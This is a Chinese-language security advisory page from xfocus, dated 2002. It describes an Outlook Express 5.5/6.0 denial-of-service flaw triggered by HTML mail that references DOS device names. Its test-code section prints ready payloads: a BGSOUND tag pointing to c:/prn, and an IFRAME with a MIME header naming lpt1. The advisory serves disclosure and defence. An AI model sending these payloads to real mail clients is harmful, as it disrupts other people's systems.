xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version
 最近严重漏洞 
Microsoft RPC接口远程任意代码可执行漏洞
Cisco IOS接口不正确处理IPV4包远程拒绝服务漏洞
Microsoft Windows CreateFile API命名管道权限提升漏洞

Microsoft Outlook Express DOS设备拒绝服务攻击漏洞


发布时间:2002-04-26
更新时间:2002-04-26
严重程度:
威胁程度:远程拒绝服务
错误类型:意外情况处置错误
利用方式:客户机模式

BUGTRAQ ID:4584

受影响系统
Microsoft Outlook Express 5.5
   + Microsoft Internet Explorer 5.0 1
   + Microsoft Internet Explorer 5.0.1 for Windows 2000
   + Microsoft Internet Explorer 5.0.1 for Windows 95
   + Microsoft Internet Explorer 5.0.1 for Windows 98
   + Microsoft Internet Explorer 5.0.1 for Windows NT 4.0
   + Microsoft Internet Explorer 5.5
   - Microsoft Windows 2000 Workstation
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows 98SE
   - Microsoft Windows NT 4.0
Microsoft Outlook Express 6.0
   - Microsoft Windows 2000 Workstation
   - Microsoft Windows 2000 Workstation SP1
   - Microsoft Windows 2000 Workstation SP2
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows 98SE
   - Microsoft Windows ME
   - Microsoft Windows NT 4.0 SP4
   - Microsoft Windows NT 4.0 SP5
   - Microsoft Windows NT 4.0 SP6a
详细描述
Microsoft Outlook Express存在一个拒绝服务攻击。

Microsoft Outlook Express没有充分检查不正常构建的HTML邮件信息,修改BGSOUND或者IFRAME标识符为包含指向不存在DOS设备的URL,可导致OUTLOOK EXPRESS消耗过多CPU时间,产生拒绝服务。

测试代码
<BGSOUND balance=0 src="file://c:/prn" volume=0loop=infinite>
或者
<iframe src=cid:FThFC7b04R6 height=10width=10></iframe>

头信息为:

Content-Type: text/plain;
name=lpt1.lpt1.lpt1
Content-Transfer-Encoding: 8bit
Content-ID: <FThFC7b04R6>

解决方案
尚无

相关信息
ERRor <error@pochtamt.ru>
Copyright © 1998-2003 XFOCUS Team. All Rights Reserved